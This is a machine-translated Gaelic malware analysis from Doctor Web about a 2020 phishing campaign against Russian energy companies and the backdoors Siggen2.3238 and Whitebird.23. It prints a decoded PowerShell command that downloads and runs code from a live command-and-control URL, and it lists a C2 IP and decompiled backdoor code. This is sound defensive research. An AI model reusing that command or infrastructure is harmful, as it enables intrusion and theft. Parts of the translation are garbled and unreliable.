Tha ar n-eòlas ann a bhith a’ sgrùdadh thachartasan tèarainteachd coimpiutair a’ sealltainn gu bheil post-d fhathast mar aon de na seanalan as cumanta a bhios luchd-ionnsaigh a’ cleachdadh gus faighinn a-steach do bhun-structaran lìonra fo ionnsaigh. Bidh aon ghnìomh gun chùram le litir amharasach (no nach eil cho amharasach) gu bhith na àite inntrigidh airson tuilleadh ghalaran, agus is e sin as coireach gu bheil cybercriminals gu gnìomhach a’ cleachdadh dòighean innleadaireachd sòisealta, ged a tha diofar ìrean de shoirbheachas ann.
Anns an dreuchd seo tha sinn airson bruidhinn mun rannsachadh a rinn sinn o chionn ghoirid air iomairt spam a tha ag amas air grunn iomairtean ann an ionad connaidh is lùth na Ruis. Lean a h-uile ionnsaigh an aon suidheachadh le bhith a’ cleachdadh puist-d meallta, agus cha robh coltas gu robh duine air mòran oidhirp a dhèanamh a-steach do shusbaint teacsa nam puist-d sin.
Seirbheis fiosrachaidh
Thòisich e uile aig deireadh a ’Ghiblein 2020, nuair a lorg luchd-anailis bhìoras Doctor Web iomairt spam anns an do chuir luchd-hackers leabhar fòn ùraichte gu luchd-obrach grunn iomairtean ann an ionad connaidh is lùth na Ruis. Gu dearbh, cha b 'e taisbeanadh sìmplidh de dhragh a bha seo, oir cha robh an eòlaire fìor, agus chuir na sgrìobhainnean .docx sìos dà ìomhaigh bho ghoireasan iomallach.
Chaidh aon dhiubh a luchdachadh sìos gu coimpiutair an neach-cleachdaidh bhon t-seirbheisiche naidheachdan[.]zannews[.]com. Bu chòir a thoirt fa-near gu bheil an t-ainm fearainn coltach ri àrainn ionad meadhanan an-aghaidh coirbeachd ann an Kazakhstan - zannews[.] kz. Air an làimh eile, bha an raon a chaidh a chleachdadh mar chuimhneachan sa bhad air iomairt 2015 eile ris an canar TOPNEWS, a chleachd cùl-raon ICEFOG agus aig an robh raointean smachd Trojan leis an fho-thalamh “naidheachdan” nan ainmean. B’ e feart inntinneach eile nuair a bhathas a’ cur post-d gu diofar luchd-faighinn, gun robh iarrtasan airson ìomhaigh a luchdachadh sìos a’ cleachdadh diofar pharaimearan iarrtas no ainmean ìomhaigh sònraichte.
Tha sinn den bheachd gun deach seo a dhèanamh airson fiosrachadh a chruinneachadh gus neach-seòlaidh “earbsach” a chomharrachadh, a bhiodh an uairsin cinnteach gum fosgail e an litir aig an àm cheart. Chaidh protocol SMB a chleachdadh gus an ìomhaigh a luchdachadh sìos bhon dàrna frithealaiche, a ghabhadh dèanamh gus hashes NetNTLM a chruinneachadh bho choimpiutairean luchd-obrach a dh’ fhosgail an sgrìobhainn a fhuaireadh.
Agus seo an litir fhèin leis an eòlaire meallta:
San Ògmhios am-bliadhna, thòisich hackers a’ cleachdadh ainm fearainn ùr, spòrs[.]manhajnews[.]com, gus dealbhan a luchdachadh suas. Sheall an anailis gun deach fo-roinnean manhajnews[.] com a chleachdadh ann am puist spama bho co-dhiù Sultain 2019. B 'e aon de na targaidean san iomairt seo oilthigh mòr Ruiseanach.
Cuideachd, ron Ògmhios, thàinig luchd-eagrachaidh an ionnsaigh suas le teacsa ùr airson na litrichean aca: an turas seo bha fiosrachadh anns an sgrìobhainn mu leasachadh gnìomhachais. Bha teacsa na litreach a 'nochdadh gu soilleir nach robh an t-ùghdar aice na neach-labhairt dùthchasach Ruiseanach, no gu robh e a' cruthachadh a leithid de bheachd mu dheidhinn fhèin. Gu mì-fhortanach, b’ e dìreach còmhdach a bh’ anns na beachdan mu leasachadh gnìomhachais, mar a bha e an-còmhnaidh - luchdaich sìos an sgrìobhainn dà ìomhaigh a-rithist, fhad ‘s a chaidh am frithealaiche atharrachadh gu luchdachadh sìos[.]inklingpaper[.]com.
Lean an ath innleachdas san Iuchar. Ann an oidhirp faighinn seachad air lorg sgrìobhainnean droch-rùnach le prògraman antivirus, thòisich luchd-ionnsaigh a’ cleachdadh sgrìobhainnean Microsoft Word air an cuairteachadh le facal-faire. Aig an aon àm, cho-dhùin an luchd-ionnsaigh dòigh innleadaireachd sòisealta clasaigeach a chleachdadh - fios duais.
Chaidh teacsa an ath-thagraidh a sgrìobhadh a-rithist san aon stoidhle, rud a thog amharas a bharrachd am measg an neach-freagairt. Cha do dh'atharraich am frithealaiche airson an dealbh a luchdachadh sìos cuideachd.
Thoir an aire, anns a h-uile suidheachadh, gun deach bogsaichean puist eileagtronaigeach a tha clàraichte air na raointean post[.]ru agus yandex[.]ru a chleachdadh airson litrichean a chuir.
Ionnsa
Ro thràth san t-Sultain 2020, bha an t-àm ann gnìomh a dhèanamh. Chlàr an luchd-anailis bhìoras againn tonn ùr de dh’ ionnsaighean, anns an do chuir luchd-ionnsaigh a-rithist litrichean fo chasaid gun robh iad ag ùrachadh leabhar fòn. Ach, an turas seo bha macro droch-rùnach anns a’ cheangal.
Nuair a dh’ fhosgail e an sgrìobhainn ceangailte, chruthaich am macro dà fhaidhle:
- Sgriobt VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, a bhathar an dùil faidhle baidse a chuir air bhog;
- Am faidhle batch fhèin %APPDATA%configstest.bat, a chaidh a chuir am falach.
Tha brìgh na h-obrach aige a’ tighinn sìos gu bhith a’ cur air bhog slige Powershell le crìochan sònraichte. Tha na crìochan a thèid a thoirt don t-slige air an dì-chòdachadh gu òrdughan:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Mar a leanas bho na h-òrdughan a chaidh a thaisbeanadh, tha an raon bhon tèid an t-uallach pàighidh a luchdachadh sìos a-rithist air a chòmhdach mar làrach naidheachdan. A sìmplidh , aig a bheil an aon obair còd slige fhaighinn bhon t-seirbheisiche àithne is smachd agus a chur an gnìomh. B’ urrainn dhuinn dà sheòrsa doras cùil a chomharrachadh a dh’ fhaodar a chuir a-steach air PC an neach-fulaing.
BackDoor.Siggen2.3238
Tha a 'chiad fhear BackDoor.Siggen2.3238 - cha robh na h-eòlaichean againn air coinneachadh roimhe, agus cha robh luchd-reic antivirus eile a’ toirt iomradh air a ’phrògram seo.
Tha am prògram seo na chùl-raon sgrìobhte ann an C ++ agus a’ ruith air siostaman-obrachaidh Windows 32-bit.
BackDoor.Siggen2.3238 comasach air conaltradh leis an t-seirbheisiche riaghlaidh a’ cleachdadh dà phròtacal: HTTP agus HTTPS. Bidh an sampall deuchainn a’ cleachdadh protocol HTTPS. Tha an cleachdaiche-àidseant a leanas air a chleachdadh ann an iarrtasan chun an fhrithealaiche:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Anns a 'chùis seo, tha a h-uile iarrtas air a thoirt seachad leis an t-seata de pharamadairean a leanas:
%s;type=%s;length=%s;realdata=%send
far a bheil:
- ID a’ choimpiutair gabhaltach,
- an seòrsa iarrtas a thèid a chur,
- fad an dàta ann an raon fìor-dàta,
- dàta.
Aig an ìre de bhith a’ cruinneachadh fiosrachadh mun t-siostam gabhaltach, bidh an backdoor a’ gineadh loidhne mar:
lan=%s;cmpname=%s;username=%s;version=%s;
far a bheil lan seòladh IP a’ choimpiutair gabhaltach, is e cmpname ainm a’ choimpiutair, is e ainm neach-cleachdaidh an t-ainm neach-cleachdaidh, is e dreach an loidhne 0.0.4.03.
Thèid am fiosrachadh seo leis an aithnichear sysinfo a chuir tro iarrtas POST chun t-seirbheisiche smachd a tha suidhichte aig https[:]//31.214[.] 157.14/log.txt. Mas ann mar fhreagairt BackDoor.Siggen2.3238 a 'faighinn an comharra HEART, thathar den bheachd gu bheil an ceangal soirbheachail, agus tha an cùl-raon a' tòiseachadh a 'phrìomh chuairt conaltraidh leis an fhrithealaiche.
Tuairisgeul nas coileanta air prionnsapalan obrachaidh BackDoor.Siggen2.3238 tha nar .
BackDoor.Whitebird.23
Tha an dàrna prògram mar atharrachadh air backdoor BackDoor.Whitebird, a tha aithnichte dhuinn mar-thà bhon tachartas le buidheann riaghaltais ann an Kazakhstan. Tha an dreach seo sgrìobhte ann an C ++ agus tha e air a dhealbhadh gus ruith air gach cuid siostaman obrachaidh Windows 32-bit agus 64-bit.
Coltach ris a’ mhòr-chuid de phrògraman den t-seòrsa seo, BackDoor.Whitebird.23 air a dhealbhadh gus ceangal crioptaichte a stèidheachadh leis an t-seirbheisiche smachd agus smachd gun chead air coimpiutair le galair. Air a chuir a-steach do shiostam cunnartach a’ cleachdadh dropper .
Bha an sampall a rinn sinn sgrùdadh na leabharlann droch-rùnach le dà às-mhalairt:
- Google Play
- Deuchainn.
Aig toiseach na h-obrach aige, bidh e a’ dì-chrioptachadh an rèiteachaidh a tha air a shreapadh gu cruaidh a-steach don bhodhaig backdoor a’ cleachdadh algairim stèidhichte air gnìomhachd XOR le byte 0x99. Tha an rèiteachadh coltach ri:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Gus dèanamh cinnteach gum bi e ag obair gu cunbhalach, bidh an cùl-raon ag atharrachadh an luach a tha air a shònrachadh san raon uairean obrach_ rèiteachaidhean. Tha 1440 bytes anns an raon, a bheir na luachan 0 no 1 agus a’ riochdachadh gach mionaid de gach uair san latha. A’ cruthachadh snàithlean air leth airson gach eadar-aghaidh lìonra a dh’èisteas ris an eadar-aghaidh agus a choimheadas airson pacaidean ceadachaidh air an fhrithealaiche progsaidh bhon choimpiutair gabhaltach. Nuair a lorgar a leithid de phacaid, cuiridh an backdoor fiosrachadh mun t-seirbheisiche progsaidh ris an liosta aige. A bharrachd air an sin, sgrùdaidhean airson làthaireachd neach-ionaid tro WinAPI InternetQueryOptionW.
Bidh am prògram a’ sgrùdadh a’ mhionaid agus an uair a th’ ann an-dràsta agus ga choimeas ris an dàta san raon uairean obrach_ rèiteachaidhean. Mura h-eil an luach airson a’ mhionaid fhreagarrach den latha neoni, thèid ceangal a stèidheachadh leis an t-seirbheisiche smachd.
Le bhith a’ stèidheachadh ceangal ris an fhrithealaiche atharrais air cruthachadh ceangal a’ cleachdadh protocol tionndadh TLS 1.0 eadar an neach-dèiligidh agus an frithealaiche. Tha dà bhufair ann am bodhaig an dorais chùil.
Anns a’ chiad bufair tha pacaid TLS 1.0 Client Hello.
Anns an dàrna bufair tha pacaidean TLS 1.0 Client Key Exchange le prìomh fhad de 0x100 bytes, Atharraich Cipher Spec, Teachdaireachd Crioptaichte Handshake.
Nuair a chuireas tu pasgan Client Hello, bidh an backdoor a’ sgrìobhadh 4 bytes den ùine làithreach agus 28 bytes de dhàta meallta air thuaiream ann an raon Client Random, air a thomhas mar a leanas:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Thèid am pasgan a fhuaireadh a chuir chun t-seirbheisiche smachd. Bidh am freagairt (pacaid Server Hello) a’ sgrùdadh:
- gèilleadh ri protocol TLS dreach 1.0;
- litrichean den stampa-ama (a’ chiad 4 byte den raon pacaid Random Data) a shònraich an neach-dèiligidh chun an stampa-ama a shònraich an t-seirbheisiche;
- maids de na ciad 4 bytes às deidh an stampa-ama ann an raon Random Data an neach-dèiligidh agus an fhrithealaiche.
Ma thachras na geamannan ainmichte, bidh an cùl-raon ag ullachadh pasgan Prìomh Iomlaid Client. Gus seo a dhèanamh, bidh e ag atharrachadh an iuchair phoblach anns a’ phacaid Cliant Key Exchange, a bharrachd air an Encryption IV agus Dàta Crioptachaidh anns a’ phasgan Teachdaireachd Crioptaichte Handshake.
Bidh an backdoor an uairsin a’ faighinn a ’phacaid bhon t-seirbheisiche àithne is smachd, a’ dèanamh cinnteach gu bheil an dreach protocol TLS 1.0, agus an uairsin a ’gabhail ri 54 bytes eile (corp a’ phacaid). Cuiridh seo crìoch air an stèidheachadh ceangail.
Tuairisgeul nas coileanta air prionnsapalan obrachaidh BackDoor.Whitebird.23 tha nar .
Co-dhùnadh agus co-dhùnaidhean
Leigidh mion-sgrùdadh air sgrìobhainnean, malware, agus am bun-structar a chaidh a chleachdadh leinn a ràdh le misneachd gun deach an ionnsaigh ullachadh le aon de na buidhnean APT Sìneach. A ’beachdachadh air comasachd dorsan cùil a tha air an cur a-steach air coimpiutairean luchd-fulaing ma thachras ionnsaigh shoirbheachail, bidh galairean a’ leantainn, aig a ’char as lugha, gu bhith a’ goid fiosrachadh dìomhair bho choimpiutairean bhuidhnean fo ionnsaigh.
A bharrachd air an sin, is e suidheachadh glè choltach a bhith a’ stàladh Trojans sònraichte air frithealaichean ionadail le gnìomh sònraichte. Dh'fhaodadh iad seo a bhith nan luchd-riaghlaidh fearainn, frithealaichean puist, geataichean eadar-lìn, msaa. Mar a chì sinn san eisimpleir , tha luchd-frithealaidh mar sin gu sònraichte inntinneach do luchd-ionnsaigh airson diofar adhbharan.
Source: www.habr.com